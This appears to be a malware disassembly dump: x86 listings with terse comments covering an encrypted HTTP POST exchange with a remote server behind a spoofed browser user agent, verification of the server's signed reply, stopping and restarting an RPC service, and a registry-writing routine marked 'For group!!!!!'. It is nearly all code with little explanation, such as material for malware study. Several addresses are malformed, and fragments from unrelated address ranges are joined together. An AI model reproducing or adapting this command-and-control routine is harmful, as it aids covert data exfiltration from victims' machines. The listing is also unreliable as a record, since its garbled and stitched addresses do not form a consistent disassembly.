- 0x8D2C94 push 00000000h
- 0x8D2C96 push 0x8DE2E8h ASCII "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0"
- 0x8D2C9B call dword ptr [0x8DE11Ch] InternetOpenA@WININET.DLL [5 Params]
- 0x8D2CA1 mov dword ptr [ebp-10h], eax
- 0x8D2CA4 cmp dword ptr [ebp-10h], 00000000h
- 0x8D2CA8 je 0x8D2DFCh target: 0x8D2DFC
- 0x8D2CAE push 00000001h
- 0x8D2CB0 push 00000000h
- 0x8D2CB2 push 00000003h
- 0x8D2CB4 push 00000000h
- 0x8D2CB6 push 00000000h
- 0x8D2CB8 movzx edx, word ptr [ebp-1Ch]
- 0x8D2CBC push edx
- 0x8D2CBD mov eax, dword ptr [ebp-14h]
- 0x8D2CC0 push eax
- 0x8D2CC1 mov ecx, dword ptr [ebp-10h]
- 0x8D2CC4 push ecx
- 0x8D2CC5 call dword ptr [0x8DE118h] InternetConnectA@WININET.DLL [8 Params]
- 0x8D2CCB mov dword ptr [ebp-24h], eax
- 0x8D2CCE cmp dword ptr [ebp-24h], 00000000h
- 0x8D2CD2 je 0x8D2DF2h target: 0x8D2DF2
- 0x8D2CD8 mov dword ptr [ebp-30h], 0x8DE2E4h ASCII "*/*"
- 0x8D2CDF mov dword ptr [ebp-2Ch], 00000000h
- 0x8D2CE6 push 00000001h
- 0x8D2CE8 push 00000100h
- 0x8D2CED lea edx, dword ptr [ebp-30h]
- 0x8D2CF0 push edx
- 0x8D2CF1 push 00000000h
- 0x8D2CF3 push 00000000h
- 0x8D2CF5 mov eax, dword ptr [ebp-0Ch]
- 0x8D2CF8 push eax
- 0x8D2CF9 push 0x8DE334h ASCII "POST"
- 0x8D2CFE mov ecx, dword ptr [ebp-24h]
- 0x8D2D01 push ecx
- 0x8D2D02 call dword ptr [0x8DE114h] HttpOpenRequestA@WININET.DLL [8 Params]
- 0x8D2D08 mov dword ptr [ebp-28h], eax
- 0x8D2D0B cmp dword ptr [ebp-28h], 00000000h
- 0x8D2D0F je 0x8D2DE8h target: 0x8D2DE8
- 0x8D2D15 push 0x8DE33Ch ASCII "Content-Type: application/x-www-form-urlencoded"
- 0x8D2D1A mov edx, dword ptr [ebp-18h]
- 0x8D2D1D push edx
- 0x8D2D1E call dword ptr [008E12D0h] strcpy@NTDLL.DLL [2 Params]
- 0x8D2D24 add esp, 08h
- 0x8D2D27 mov eax, dword ptr [ebp-04h]
- 0x8D2D2A mov ecx, dword ptr [ebp+10h]
- 0x8D2D2D mov dword ptr [eax], ecx
- 0x8D2D2F mov edx, dword ptr [ebp+10h]
- 0x8D2D32 push edx
- 0x8D2D33 mov eax, dword ptr [ebp+0Ch]
- 0x8D2D36 push eax
- 0x8D2D37 mov ecx, dword ptr [ebp-04h]
- 0x8D2D3A add ecx, 04h
- 0x8D2D3D push ecx
- 0x8D2D3E call dword ptr [008E12E4h] memcpy@NTDLL.DLL [Unknown Params]
- 0x8D2D44 add esp, 0Ch
- 0x8D2D47 mov edx, dword ptr [ebp-04h]
- 0x8D2D4A add edx, dword ptr [ebp+10h]
- 0x8D2D4D mov eax, dword ptr [ebp+18h]
- 0x8D2D50 mov dword ptr [edx+04h], eax
- 0x8D2D53 mov ecx, dword ptr [ebp+18h]
- 0x8D2D56 push ecx
- 0x8D2D57 mov edx, dword ptr [ebp+14h]
- 0x8D2D5A push edx
- 0x8D2D5B mov eax, dword ptr [ebp+10h]
- 0x8D2D5E mov ecx, dword ptr [ebp-04h]
- 0x8D2D61 lea edx, dword ptr [ecx+eax+08h]
- 0x8D2D65 push edx
- 0x8D2D66 call dword ptr [008E12E4h] memcpy@NTDLL.DLL [Unknown Params]
- 0x8D2D6C add esp, 0Ch
- 0x8D2D6F mov eax, dword ptr [ebp+18h]
- 0x8D2D72 mov ecx, dword ptr [ebp+10h]
- 0x8D2D75 lea edx, dword ptr [ecx+eax+08h]
- 0x8D2D79 mov dword ptr [ebp-34h], edx
- 0x8D2D7C mov eax, dword ptr [ebp-34h]
- 0x8D2D7F push eax
- 0x8D2D80 mov ecx, dword ptr [ebp-04h]
- 0x8D2D83 push ecx
- 0x8D2D84 mov edx, dword ptr [ebp-18h]
- 0x8D2D87 push edx
- 0x8D2D88 call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x8D2D8E add esp, 04h
- 0x8D2D91 push eax
- 0x8D2D92 mov eax, dword ptr [ebp-18h]
- 0x8D2D95 push eax
- 0x8D2D96 mov ecx, dword ptr [ebp-28h]
- 0x8D2D99 push ecx
- 0x8D2D9A call dword ptr [0x8DE110h] HttpSendRequestA@WININET.DLL [5 Params]
- 0x8D2DA0 test eax, eax
- 0x8D2DA2 je 0x8D2DDEh target: 0x8D2DDE
- 0x8D2DA4 lea edx, dword ptr [ebp-20h] xref: 0x8D2DDC
- 0x8D2DA7 push edx
- 0x8D2DA8 push 00001000h
- 0x8D2DAD mov eax, dword ptr [ebp+1Ch]
- 0x8D2DB0 add eax, dword ptr [ebp-08h]
- 0x8D2DB3 push eax
- 0x8D2DB4 mov ecx, dword ptr [ebp-28h]
- 0x8D2DB7 push ecx
- 0x8D2DB8 call dword ptr [0x8DE10Ch] InternetReadFile@WININET.DLL [4 Params]
- 0x8D2DBE test eax, eax
- 0x8D2DC0 jne 0x8D2DCBh target: 0x8D2DCB
- 0x8D2DC2 mov dword ptr [ebp-08h], 00000000h
- 0x8D2DC9 jmp 0x8D2DDEh target: 0x8D2DDE
- 0x8D2DCB cmp dword ptr [ebp-20h], 00000000h xref: 0x8D2DC0
- 0x8D2DCF jne 0x8D2DD3h target: 0x8D2DD3
- 0x8D2DD1 jmp 0x8D2DDEh target: 0x8D2DDE
- 0x8D2DD3 mov edx, dword ptr [ebp-08h] xref: 0x8D2DCF
- 0x8D2DD6 add edx, dword ptr [ebp-20h]
- 0x8D2DD9 mov dword ptr [ebp-08h], edx
- 0x8D2DDC jmp 0x8D2DA4h target: 0x8D2DA4
- 0x8D2DDE mov eax, dword ptr [ebp-28h] xref: 0x8D2DA2 0x8D2DD1 0x8D2DC9
- 0x8D2DE1 push eax
- 0x8D2DE2 call dword ptr [0x8DE108h] InternetCloseHandle@WININET.DLL [1 Params]
- 0x8D2DE8 mov ecx, dword ptr [ebp-24h] xref: 0x8D2D0F
- 0x8D2DEB push ecx
- 0x8D2DEC call dword ptr [0x8DE108h] InternetCloseHandle@WININET.DLL [1 Params]
- 0x8D2DF2 mov edx, dword ptr [ebp-10h] xref: 0x8D2CD2
- 0x8D2DF5 push edx
- 0x8D2DF6 call dword ptr [0x8DE108h] InternetCloseHandle@WININET.DLL [1 Params]
- 0x8D2DFC mov eax, dword ptr [ebp-18h] xref: 0x8D2CA8
- 0x8D2DFF push eax
- 0x8D2E00 push 00000000h
- 0x8D2E02 mov ecx, dword ptr [008E12D8h] 0x00AC0000
- 0x8D2E08 push ecx
- 0x8D2E09 call dword ptr [0x8DE0B4h] RtlFreeHeap@NTDLL.DLL [3 Params]
- 0x8D2E0F mov edx, dword ptr [ebp-04h]
- 0x8D2E12 push edx
- 0x8D2E13 push 00000000h
- 0x8D2E15 mov eax, dword ptr [008E12D8h] 0x00AC0000
- 0x8D2E1A push eax
- 0x8D2E1B call dword ptr [0x8DE0B4h] RtlFreeHeap@NTDLL.DLL [3 Params]
- 0x8D2E21 mov ecx, dword ptr [ebp-14h]
- 0x8D2E24 push ecx
- 0x8D2E25 push 00000000h
- 0x8D2E27 mov edx, dword ptr [008E12D8h] 0x00AC0000
- 0x8D2E2D push edx
- 0x8D2E2E call dword ptr [0x8DE0B4h] RtlFreeHeap@NTDLL.DLL [3 Params]
- 0x8D2E34 mov eax, dword ptr [ebp-0Ch]
- 0x8D2E37 push eax
- 0x8D2E38 push 00000000h
- 0x8D2E3A mov ecx, dword ptr [008E12D8h] 0x00AC0000
- 0x8D2E40 push ecx
- 0x8D2E41 call dword ptr [0x8DE0B4h] RtlFreeHeap@NTDLL.DLL [3 Params]
- 0x8D2E47 mov eax, dword ptr [ebp-08h]
- 0x8D2E4A mov esp, ebp
- 0x8D2E4C pop ebp
- 0x8D2E4D ret
- // Using WindowsEncryption for sending data in POST
- 0x8D2E50 push ebp xref: 0x8D5AC1 0x8D5A8E
- 0x8D2E51 mov ebp, esp
- 0x8D2E53 sub esp, 70h
- 0x8D2E56 mov dword ptr [ebp-0Ch], 00000000h
- 0x8D2E5D mov eax, dword ptr [ebp+0Ch]
- 0x8D2E60 mov dword ptr [ebp-54h], eax
- 0x8D2E63 mov ecx, dword ptr [ebp-54h]
- 0x8D2E66 add ecx, 01h
- 0x8D2E69 mov dword ptr [ebp-58h], ecx
- 0x8D2E6C mov edx, dword ptr [ebp-54h] xref: 0x8D2E7C
- 0x8D2E6F mov al, byte ptr [edx]
- 0x8D2E71 mov byte ptr [ebp-59h], al
- 0x8D2E74 add dword ptr [ebp-54h], 01h
- 0x8D2E78 cmp byte ptr [ebp-59h], 00000000h
- 0x8D2E7C jne 0x8D2E6Ch target: 0x8D2E6C
- 0x8D2E7E mov ecx, dword ptr [ebp-54h]
- 0x8D2E81 sub ecx, dword ptr [ebp-58h]
- 0x8D2E84 mov dword ptr [ebp-60h], ecx
- 0x8D2E87 cmp dword ptr [ebp-60h], 00000800h
- 0x8D2E8E jbe 0x8D2E99h target: 0x8D2E99
- 0x8D2E90 mov dword ptr [ebp-04h], 00100000h
- 0x8D2E97 jmp 0x8D2EA0h target: 0x8D2EA0
- 0x8D2E99 mov dword ptr [ebp-04h], 00001000h xref: 0x8D2E8E
- 0x8D2EA0 mov edx, dword ptr [ebp-04h] xref: 0x8D2E97
- 0x8D2EA3 push edx
- 0x8D2EA4 call dword ptr [0x8DE0D8h] malloc@MSVCRT.DLL [0 Params]
- 0x8D2EAA add esp, 04h
- 0x8D2EAD mov dword ptr [ebp-14h], eax
- 0x8D2EB0 mov eax, dword ptr [ebp-04h]
- 0x8D2EB3 mov dword ptr [ebp-18h], eax
- 0x8D2EB6 mov ecx, dword ptr [ebp-04h]
- 0x8D2EB9 push ecx
- 0x8D2EBA call dword ptr [0x8DE0D8h] malloc@MSVCRT.DLL [0 Params]
- 0x8D2EC0 add esp, 04h
- 0x8D2EC3 mov dword ptr [ebp-08h], eax
- 0x8D2EC6 mov edx, dword ptr [ebp-04h]
- 0x8D2EC9 mov dword ptr [ebp-10h], edx
- 0x8D2ECC mov eax, dword ptr [ebp+0Ch]
- 0x8D2ECF mov dword ptr [ebp-64h], eax
- 0x8D2ED2 mov ecx, dword ptr [ebp-64h]
- 0x8D2ED5 add ecx, 01h
- 0x8D2ED8 mov dword ptr [ebp-68h], ecx
- 0x8D2EDB mov edx, dword ptr [ebp-64h] xref: 0x8D2EEB
- 0x8D2EDE mov al, byte ptr [edx]
- 0x8D2EE0 mov byte ptr [ebp-69h], al
- 0x8D2EE3 add dword ptr [ebp-64h], 01h
- 0x8D2EE7 cmp byte ptr [ebp-69h], 00000000h
- 0x8D2EEB jne 0x8D2EDBh target: 0x8D2EDB
- 0x8D2EED mov ecx, dword ptr [ebp-64h]
- 0x8D2EF0 sub ecx, dword ptr [ebp-68h]
- 0x8D2EF3 mov dword ptr [ebp-70h], ecx
- 0x8D2EF6 push 00000000h
- 0x8D2EF8 push 00000000h
- 0x8D2EFA push 00000009h
- 0x8D2EFC mov edx, dword ptr [ebp-70h]
- 0x8D2EFF push edx
- 0x8D2F00 mov eax, dword ptr [ebp+0Ch]
- 0x8D2F03 push eax
- 0x8D2F04 lea ecx, dword ptr [ebp-18h]
- 0x8D2F07 push ecx
- 0x8D2F08 mov edx, dword ptr [ebp-14h]
- 0x8D2F0B push edx
- 0x8D2F0C call 0x8D8430h target: 0x8D8430
- 0x8D2F11 test eax, eax
- 0x8D2F13 jne 0x8D3107h target: 0x8D3107
- 0x8D2F19 push 00000010h
- 0x8D2F1B lea eax, dword ptr [ebp-2Ch]
- 0x8D2F1E push eax
- 0x8D2F1F call 0x8D1EB0h target: 0x8D1EB0
- 0x8D2F24 add esp, 08h
- 0x8D2F27 push 00000010h
- 0x8D2F29 lea ecx, dword ptr [ebp-2Ch]
- 0x8D2F2C push ecx
- 0x8D2F2D mov edx, dword ptr [ebp-18h]
- 0x8D2F30 push edx
- 0x8D2F31 mov eax, dword ptr [ebp-08h]
- 0x8D2F34 push eax
- 0x8D2F35 mov ecx, dword ptr [ebp-14h]
- 0x8D2F38 push ecx
- 0x8D2F39 call 0x8D1E10h target: 0x8D1E10
- 0x8D2F3E add esp, 14h
- 0x8D2F41 mov edx, dword ptr [ebp-18h]
- 0x8D2F44 mov dword ptr [ebp-10h], edx
- 0x8D2F47 mov dword ptr [ebp-1Ch], 00000000h
- 0x8D2F4E push 00000010h
- 0x8D2F50 lea eax, dword ptr [ebp-1Ch]
- 0x8D2F53 push eax
- 0x8D2F54 push 00000000h
- 0x8D2F56 push 00000000h
- 0x8D2F58 push 00000001h
- 0x8D2F5A push 00000000h
- 0x8D2F5C mov ecx, dword ptr [ebp+18h]
- 0x8D2F5F push ecx
- 0x8D2F60 call dword ptr [0x8DE004h] CryptEncrypt@ADVAPI32.DLL [7 Params]
- 0x8D2F66 test eax, eax
- 0x8D2F68 je 0x8D3107h target: 0x8D3107
- 0x8D2F6E mov edx, dword ptr [ebp-1Ch]
- 0x8D2F71 push edx
- 0x8D2F72 call dword ptr [0x8DE0D8h] malloc@MSVCRT.DLL [0 Params]
- 0x8D2F78 add esp, 04h
- 0x8D2F7B mov dword ptr [ebp-34h], eax
- 0x8D2F7E mov dword ptr [ebp-30h], 00000010h
- 0x8D2F85 mov eax, dword ptr [ebp-34h]
- 0x8D2F88 mov ecx, dword ptr [ebp-2Ch]
- 0x8D2F8B mov dword ptr [eax], ecx
- 0x8D2F8D mov edx, dword ptr [ebp-28h]
- 0x8D2F90 mov dword ptr [eax+04h], edx
- 0x8D2F93 mov ecx, dword ptr [ebp-24h]
- 0x8D2F96 mov dword ptr [eax+08h], ecx
- 0x8D2F99 mov edx, dword ptr [ebp-20h]
- 0x8D2F9C mov dword ptr [eax+0Ch], edx
- 0x8D2F9F mov eax, dword ptr [ebp-1Ch]
- 0x8D2FA2 push eax
- 0x8D2FA3 lea ecx, dword ptr [ebp-30h]
- 0x8D2FA6 push ecx
- 0x8D2FA7 mov edx, dword ptr [ebp-34h]
- 0x8D2FAA push edx
- 0x8D2FAB push 00000000h
- 0x8D2FAD push 00000001h
- 0x8D2FAF push 00000000h
- 0x8D2FB1 mov eax, dword ptr [ebp+18h]
- 0x8D2FB4 push eax
- 0x8D2FB5 call dword ptr [0x8DE004h] CryptEncrypt@ADVAPI32.DLL [7 Params]
- 0x8D2FBB test eax, eax
- 0x8D2FBD je 0x8D30FAh target: 0x8D30FA
- 0x8D2FC3 mov ecx, dword ptr [ebp+10h]
- 0x8D2FC6 push ecx
- 0x8D2FC7 mov edx, dword ptr [ebp-10h]
- 0x8D2FCA push edx
- 0x8D2FCB mov eax, dword ptr [ebp-08h]
- 0x8D2FCE push eax
- 0x8D2FCF mov ecx, dword ptr [ebp-1Ch]
- 0x8D2FD2 push ecx
- 0x8D2FD3 mov edx, dword ptr [ebp-34h]
- 0x8D2FD6 push edx
- 0x8D2FD7 mov eax, dword ptr [ebp+08h]
- 0x8D2FDA push eax
- 0x8D2FDB call 0x8D2C00h target: 0x8D2C00
- 0x8D2FE0 add esp, 18h
- 0x8D2FE3 mov dword ptr [ebp-38h], eax
- 0x8D2FE6 cmp dword ptr [ebp-38h], 04h
- 0x8D2FEA jbe 0x8D30FAh target: 0x8D30FA
- 0x8D2FF0 mov ecx, dword ptr [ebp+10h]
- 0x8D2FF3 mov edx, dword ptr [ecx]
- 0x8D2FF5 mov dword ptr [ebp-3Ch], edx
- 0x8D2FF8 mov eax, dword ptr [ebp+10h]
- 0x8D2FFB add eax, 04h
- 0x8D2FFE mov dword ptr [ebp-40h], eax
- 0x8D3001 mov ecx, dword ptr [ebp-3Ch]
- 0x8D3004 add ecx, 08h
- 0x8D3007 cmp ecx, dword ptr [ebp-38h]
- 0x8D300A jnc 0x8D30FAh target: 0x8D30FA
- 0x8D3010 mov edx, dword ptr [ebp+10h]
- 0x8D3013 add edx, dword ptr [ebp-3Ch]
- 0x8D3016 mov eax, dword ptr [edx+04h]
- 0x8D3019 mov dword ptr [ebp-44h], eax
- 0x8D301C mov ecx, dword ptr [ebp-3Ch]
- 0x8D301F mov edx, dword ptr [ebp+10h]
- 0x8D3022 lea eax, dword ptr [edx+ecx+08h]
- 0x8D3026 mov dword ptr [ebp-48h], eax
- 0x8D3029 mov ecx, dword ptr [ebp-44h]
- 0x8D302C mov edx, dword ptr [ebp-3Ch]
- 0x8D302F lea eax, dword ptr [edx+ecx+08h]
- 0x8D3033 cmp eax, dword ptr [ebp-38h]
- 0x8D3036 jne 0x8D30FAh target: 0x8D30FA
- 0x8D303C lea ecx, dword ptr [ebp-4Ch]
- 0x8D303F push ecx
- 0x8D3040 push 00000000h
- 0x8D3042 push 00000000h
- 0x8D3044 push 00008003h
- 0x8D3049 mov edx, dword ptr [ebp+14h]
- 0x8D304C push edx
- 0x8D304D call dword ptr [0x8DE0x8h] CryptCreateHash@ADVAPI32.DLL [5 Params]
- 0x8D3053 push 00000000h
- 0x8D3055 push 00000010h
- 0x8D3057 lea eax, dword ptr [ebp-2Ch]
- 0x8D305A push eax
- 0x8D305B mov ecx, dword ptr [ebp-4Ch]
- 0x8D305E push ecx
- 0x8D305F call dword ptr [0x8DE00Ch] CryptHashData@ADVAPI32.DLL [4 Params]
- 0x8D3065 push 00000000h
- 0x8D3067 push 00000000h
- 0x8D3069 mov edx, dword ptr [ebp+18h]
- 0x8D306C push edx
- 0x8D306D mov eax, dword ptr [ebp-3Ch]
- 0x8D3070 push eax
- 0x8D3071 mov ecx, dword ptr [ebp-40h]
- 0x8D3074 push ecx
- 0x8D3075 mov edx, dword ptr [ebp-4Ch]
- 0x8D3078 push edx
- 0x8D3079 call dword ptr [0x8DE010h] CryptVerifySignatureA@ADVAPI32.DLL [6 Params]
- 0x8D307F test eax, eax
- 0x8D3081 je 0x8D30F0h target: 0x8D30F0
- 0x8D3083 mov eax, dword ptr [ebp-44h]
- 0x8D3086 push eax
- 0x8D3087 call dword ptr [0x8DE0D8h] malloc@MSVCRT.DLL [0 Params]
- 0x8D308D add esp, 04h
- 0x8D3090 mov dword ptr [ebp-50h], eax
- 0x8D3093 push 00000010h
- 0x8D3095 lea ecx, dword ptr [ebp-2Ch]
- 0x8D3098 push ecx
- 0x8D3099 mov edx, dword ptr [ebp-44h]
- 0x8D309C push edx
- 0x8D309D mov eax, dword ptr [ebp-50h]
- 0x8D30A0 push eax
- 0x8D30A1 mov ecx, dword ptr [ebp-48h]
- 0x8D30A4 push ecx
- 0x8D30A5 call 0x8D1E10h target: 0x8D1E10
- 0x8D30AA add esp, 14h
- 0x8D30AD mov dword ptr [ebp-0Ch], 00A00000h
- 0x8D30B4 push 00000000h xref: 0x8D317D
- 0x8D30B6 push 00000000h
- 0x8D30B8 mov edx, dword ptr [ebp-44h] xref: 0x8D318D
- 0x8D30BB push edx
- 0x8D30BC mov eax, dword ptr [ebp-50h]
- 0x8D30BF push eax
- 0x8D30C0 lea ecx, dword ptr [ebp-0Ch]
- 0x8D30C3 push ecx
- 0x8D30C4 mov edx, dword ptr [ebp+10h]
- 0x8D30C7 push edx
- 0x8D30C8 call 0x8D84FAh target: 0x8D84FA
- 0x8D30CD test eax, eax
- 0x8D30CF jne 0x8D30DCh target: 0x8D30DC
- 0x8D30D1 mov eax, dword ptr [ebp+10h]
- 0x8D30D4 add eax, dword ptr [ebp-0Ch]
- 0x8D30D7 mov byte ptr [eax], 00000000h
- 0x8D30DA jmp 0x8D30E3h target: 0x8D30E3
- 0x8D30DC mov dword ptr [ebp-0Ch], 00000000h xref: 0x8D30CF
- 0x8D30E3 mov ecx, dword ptr [ebp-50h] xref: 0x8D30DA
- 0x8D30E6 push ecx
- 0x8D30E7 call dword ptr [0x8DE0D4h] free@MSVCRT.DLL [0 Params]
- 0x8D30ED add esp, 04h
- 0x8D30F0 mov edx, dword ptr [ebp-4Ch] xref: 0x8D3081
- 0x8D30F3 push edx
- 0x8D30F4 call dword ptr [0x8DE000h] CryptDestroyHash@ADVAPI32.DLL [1 Params]
- 0x8D30FA mov eax, dword ptr [ebp-34h] xref: 0x8D2FBD 0x8D2FEA 0x8D300A 0x8D3036
- 0x8D30FD push eax
- 0x8D30FE call dword ptr [0x8DE0D4h] free@MSVCRT.DLL [0 Params]
- 0x8D3104 add esp, 04h
- 0x8D3107 mov ecx, dword ptr [ebp-14h] xref: 0x8D2F13 0x8D2F68
- 0x8D310A push ecx
- 0x8D310B call dword ptr [0x8DE0D4h] free@MSVCRT.DLL [0 Params]
- 0x8D3111 add esp, 04h
- 0x8D3114 mov edx, dword ptr [ebp-08h]
- 0x8D3117 push edx
- 0x8D3118 call dword ptr [0x8DE0D4h] free@MSVCRT.DLL [0 Params]
- 0x8D311E add esp, 04h
- 0x8D3121 mov eax, dword ptr [ebp-0Ch]
- 0x8D3124 mov esp, ebp
- 0x8D3126 pop ebp
- 0x8D3127 ret function end
- // Stopping RPC Service....
- 0x1031D8 call dword ptr [0x101130h] RpcServerUnregisterIf@RPCRT4.DLL
- 0x1031DE mov esi, 0x104094h
- 0x1031E3 push esi
- 0x1031E4 mov edi, eax
- 0x1031E6 call dword ptr [0x10x168h] EnterCriticalSection@KERNEL32.DLL
- 0x1031EC dec dword ptr [0x104090h]
- 0x1031F2 jne 0x103202h target: 0x103202
- 0x1031F4 push 00000000h
- 0x1031F6 call dword ptr [0x101144h] RpcMgmtStopServerListening@RPCRT4.DLL [1 Params]
- 0x1031FC call dword ptr [0x101128h] RpcMgmtWaitServerListen@RPCRT4.DLL
- 0x103202 push esi xref: 0x1031F2
- 0x103203 call dword ptr [0x10x160h] LeaveCriticalSection@KERNEL32.DLL
- 0x103209 push edi
- 0x10320A call dword ptr [0x101140h] I_RpcMapWin32Status@RPCRT4.DLL [1 Params]
- 0x103210 pop edi
- 0x103211 pop esi
- 0x103212 pop ebp
- 0x103213 retn 0004h
- // Restarted it...
- 0x1001DE2 push ebp
- 0x1001DE3 mov ebp, esp
- 0x1001DE5 push esi
- 0x1001DE6 push edi
- 0x1001DE7 mov esi, 0x1004094h
- 0x1001DEC push esi
- 0x1001DED call dword ptr [0x1001068h] EnterCriticalSection@KERNEL32.DLL
- 0x1001DF3 push dword ptr [ebp+0Ch]
- 0x1001DF6 push dword ptr [ebp+08h]
- 0x1001DF9 call 0x1001E47h target: 0x1001E47
- 0x1001DFE mov edi, eax
- 0x1001E00 test edi, edi
- 0x1001E02 jne 0x1001E2Eh target: 0x1001E2E
- 0x1001E04 inc dword ptr [0x1004090h]
- 0x1001E0A cmp dword ptr [0x1004090h], 01h
- 0x1001E11 jne 0x1001E2Eh target: 0x1001E2E
- 0x1001E13 push 00000001h
- 0x1001E15 push 00003039h
- 0x1001E1A push 00000001h
- 0x1001E1C call dword ptr [0x1001134h] RpcServerListen@RPCRT4.DLL
- 0x1001E22 mov edi, eax
- 0x1001E24 cmp edi, 000006B1h
- 0x1001E2A jne 0x1001E2Eh target: 0x1001E2E
- 0x1001E2C xor edi, edi
- 0x1001E2E push esi xref: 0x1001E02 0x1001E11 0x1001E2A
- 0x1001E2F call dword ptr [0x1001060h] LeaveCriticalSection@KERNEL32.DLL
- 0x1001E35 push edi
- 0x1001E36 call dword ptr [0x1001140h] I_RpcMapWin32Status@RPCRT4.DLL [1 Params]
- 0x1001E3C pop edi
- 0x1001E3D pop esi
- 0x1001E3E pop ebp
- 0x1001E3F retn 0008h
- // The tyoical "For group!!!!!" registry buff..
- /*
- For group!!!!!, ADDR : 0x0D6EA1
- For group!!!!!, ADDR: 0x0D6EC8
- For group!!!!!, ADDR: 0x0D6EF9
- For group!!!!!, ADDR: 0x0D6F3A
- */
- 0x0D6E00 push ebp xref: 0x0D63D3
- 0x0D6E01 mov ebp, esp
- 0x0D6E03 sub esp, 28h
- 0x0D6E06 push esi
- 0x0D6E07 mov byte ptr [ebp-15h], 00000000h
- 0x0D6E0B push 00001000h
- 0x0D6E10 push 00000000h
- 0x0D6E12 mov eax, dword ptr [008E12D8h] 0x00AC0000
- 0x0D6E17 push eax
- 0x0D6E18 call dword ptr [0x0DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x0D6E1E mov dword ptr [ebp-20h], eax
- 0x0D6E21 push 00001000h
- 0x0D6E26 push 00000000h
- 0x0D6E28 mov ecx, dword ptr [008E12D8h] 0x00AC0000
- 0x0D6E2E push ecx
- 0x0D6E2F call dword ptr [0x0DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x0D6E35 mov dword ptr [ebp-1Ch], eax
- 0x0D6E38 lea edx, dword ptr [ebp-0Ch]
- 0x0D6E3B push edx
- 0x0D6E3C call 0x0D19D0h target: 0x0D19D0
- 0x0D6E41 add esp, 04h
- 0x0D6E44 push 0x0DF028h ASCII "Software\"
- 0x0D6E49 mov eax, dword ptr [ebp-20h]
- 0x0D6E4C push eax
- 0x0D6E4D call dword ptr [008E12D0h] strcpy@NTDLL.DLL [2 Params]
- 0x0D6E53 add esp, 08h
- 0x0D6E56 lea ecx, dword ptr [ebp-0Ch]
- 0x0D6E59 push ecx
- 0x0D6E5A mov edx, dword ptr [ebp-20h]
- 0x0D6E5D push edx
- 0x0D6E5E call dword ptr [008E12E0h] strcat@NTDLL.DLL [2 Params]
- 0x0D6E64 add esp, 08h
- 0x0D6E67 mov eax, dword ptr [ebp-1Ch]
- 0x0D6E6A push eax
- 0x0D6E6B call 0x0D19D0h target: 0x0D19D0
- 0x0D6E70 add esp, 04h
- 0x0D6E73 push 00001000h
- 0x0D6E78 push 00000000h
- 0x0D6E7A mov ecx, dword ptr [008E12D8h] 0x00AC0000
- 0x0D6E80 push ecx
- 0x0D6E81 call dword ptr [0x0DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x0D6E87 mov dword ptr [ebp-14h], eax
- 0x0D6E8A push 00001000h
- 0x0D6E8F push 00000000h
- 0x0D6E91 mov edx, dword ptr [008E12D8h] 0x00AC0000
- 0x0D6E97 push edx
- 0x0D6E98 call dword ptr [0x0DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x0D6E9E mov dword ptr [ebp-24h], eax
- 0x0D6EA1 push 0x0DF034h ASCII "For group!!!!!"
- 0x0D6EA6 mov eax, dword ptr [ebp-14h]
- 0x0D6EA9 push eax
- 0x0D6EAA call dword ptr [008E12D0h] strcpy@NTDLL.DLL [2 Params]
- 0x0D6EB0 add esp, 08h
- 0x0D6EB3 mov ecx, dword ptr [ebp+08h]
- 0x0D6EB6 push ecx
- 0x0D6EB7 call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x0D6EBD add esp, 04h
- 0x0D6EC0 add eax, 01h
- 0x0D6EC3 push eax
- 0x0D6EC4 mov edx, dword ptr [ebp+08h]
- 0x0D6EC7 push edx
- 0x0D6EC8 push 0x0DF044h ASCII "For group!!!!!"
- 0x0D6ECD call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x0D6ED3 add esp, 04h
- 0x0D6ED6 mov ecx, dword ptr [ebp-14h]
- 0x0D6ED9 lea edx, dword ptr [ecx+eax+01h]
- 0x0D6EDD push edx
- 0x0D6EDE call dword ptr [008E12E4h] memcpy@NTDLL.DLL [Unknown Params]
- 0x0D6EE4 add esp, 0Ch
- 0x0D6EE7 mov eax, dword ptr [ebp+0Ch]
- 0x0D6EEA push eax
- 0x0D6EEB call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x0D6EF1 add esp, 04h
- 0x0D6EF4 push eax
- 0x0D6EF5 mov ecx, dword ptr [ebp+0Ch]
- 0x0D6EF8 push ecx
- 0x0D6EF9 push 0x0DF054h ASCII "For group!!!!!"
- 0x0D6EFE call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x0D6F04 add esp, 04h
- 0x0D6F07 mov esi, eax
- 0x0D6F09 mov edx, dword ptr [ebp+08h]
- 0x0D6F0C push edx
- 0x0D6F0D call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x0D6F13 add esp, 04h
- 0x0D6F16 lea eax, dword ptr [esi+eax+02h]
- 0x0D6F1A push eax
- 0x0D6F1B mov ecx, dword ptr [ebp-24h]
- 0x0D6F1E push ecx
- 0x0D6F1F mov edx, dword ptr [ebp-14h]
- 0x0D6F22 push edx
- 0x0D6F23 call 0x0D1E10h target: 0x0D1E10
- 0x0D6F28 add esp, 14h
- 0x0D6F2B mov eax, dword ptr [ebp+08h]
- 0x0D6F2E push eax
- 0x0D6F2F call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x0D6F35 add esp, 04h
- 0x0D6F38 mov esi, eax
- 0x0D6F3A push 0x0DF064h ASCII "For group!!!!!"
- 0x0D6F3F call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x0D6F45 add esp, 04h
- 0x0D6F48 lea ecx, dword ptr [esi+eax+02h]
- 0x0D6F4C mov dword ptr [ebp-28h], ecx
- 0x0D6F4F lea edx, dword ptr [ebp-10h]
- 0x0D6F52 push edx
- 0x0D6F53 mov eax, dword ptr [ebp-20h]
- 0x0D6F56 push eax
- 0x0D6F57 push 80000001h
- 0x0D6F5C call dword ptr [0x0DE018h] RegCreateKeyA@ADVAPI32.DLL [3 Params]
- 0x0D6F62 test eax, eax
- 0x0D6F64 jne 0x0D6F92h target: 0x0D6F92
- 0x0D6F66 mov ecx, dword ptr [ebp-28h]
